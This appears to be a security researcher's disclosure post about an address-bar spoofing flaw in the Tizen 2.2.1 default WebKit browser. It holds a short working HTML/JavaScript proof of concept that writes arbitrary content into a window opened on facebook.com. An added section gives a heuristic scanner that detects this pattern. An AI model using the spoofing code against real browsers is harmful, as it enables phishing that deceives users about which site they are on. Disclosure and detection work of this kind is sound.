Tizen 2.2.1 WebKit Address Spoofing

Posted by Ajin Abraham on Dec 23 2014

TL;DR

A vulnerability in Tizen 2.2.1's default WebKit-based web browser allowed address bar spoofing, where an attacker can show arbitrary content under a URL of their choice.

While doing research on the Tizen operating system, I found a vulnerability in the default web browser, which uses WebKit. It is an address bar spoofing vulnerability that allows an attacker to show a webpage with arbitrary content and set it to any URL or domain of choice. This was a previously identified WebKit bug that was not fixed in Tizen's browser implementation.

PoC Code

<!--
Title: Tizen 2.2.1 WebKit Address Spoofing Vulnerability
Author: Ajin Abraham | @ajinabraham
Website: http://opensecurity.in
Affected Product: Tizen Default Browser
Affected Version: Tizen 2.2.1
-->
<html>
<head><title>Tizen Browser - Address bar spoofing</title>
<script>
// Open a new window for the URL that should appear in the address bar.
w=window.open('https://facebook.com/');
// Write arbitrary content into that window; the affected browser shows it under the URL above.
w.document.write("<h1>You 've been Hacked</h1>");
w.focus();
</script>
</head>
</html>
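
A heuristic static check for the pattern the PoC relies on (an added example, not part of the original post): it flags inline scripts that keep the handle returned by window.open() for an absolute URL and later call document.write on that window. The function name and both sample pages are constructed for illustration; only inline scripts and literal URLs are covered.

```javascript
// Added example: heuristic scanner for "window.open(url) then handle.document.write".
// findOpenThenWrite and the SAMPLE_* pages are hypothetical names / constructed input.
const escapeRe = (s) => s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');

function findOpenThenWrite(html) {
  const findings = [];
  // Bodies of inline <script> elements.
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  // handle = window.open('<absolute http(s) URL>' ...
  const openRe = /([A-Za-z_$][\w$]*)\s*=\s*(?:window\s*\.\s*)?open\s*\(\s*(['"`])(https?:\/\/[^'"`]+)\2/g;
  for (const [, code] of html.matchAll(scriptRe)) {
    for (const m of code.matchAll(openRe)) {
      const handle = m[1];
      const url = m[3];
      // Only code after the open() call matters: the write must go through the handle.
      const rest = code.slice(m.index + m[0].length);
      const sinkRe = new RegExp(
        '(?<![\\w$.])' + escapeRe(handle) +
        '\\s*\\.\\s*document\\s*\\.\\s*(write|writeln)\\s*\\(');
      const sink = rest.match(sinkRe);
      if (sink) findings.push({ handle, url, sink: 'document.' + sink[1] });
    }
  }
  return findings;
}

// Constructed sample: same shape as the PoC, with a placeholder URL and text.
const SAMPLE_POC_LIKE = `<html><head><script>
w = window.open('https://example.com/');
w.document.write("<h1>spoofed content</h1>");
w.focus();
</script></head></html>`;

// Constructed sample: opens a window but only writes to its own document.
const SAMPLE_BENIGN = `<html><head><script>
var help = window.open('https://example.com/help');
help.focus();
document.write('<p>opened help</p>');
</script></head></html>`;

console.log(findOpenThenWrite(SAMPLE_POC_LIKE));
console.log(findOpenThenWrite(SAMPLE_BENIGN));
```

A hit is a lead for manual review, not proof of spoofing: whether the written content appears under the opened URL depends on the browser, as with the Tizen 2.2.1 browser described above.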



Ajin Abraham


Ajin Abraham is a Security Engineer with 7+ years of experience in Application Security, including 4 years of Security Research. He is passionate about developing new and unique security tools. His contributions to the hacker's arsenal include OWASP Xenotix XSS Exploit Framework, Mobile Security Framework (MobSF), Droid Application Fuzz Framework (DAFF), Xenotix xBOT, and NodeJsScan, to name a few. He has been invited to speak at multiple security conferences including ClubHack, Nullcon, OWASP AppSec Eu, OWASP AppSec AsiaPac, BlackHat Europe, Hackmiami, Confidence, BlackHat US, BlackHat Asia, ToorCon, Ground Zero Summit, Hack In Paris, Hack In the Box, c0c0n and PHDays.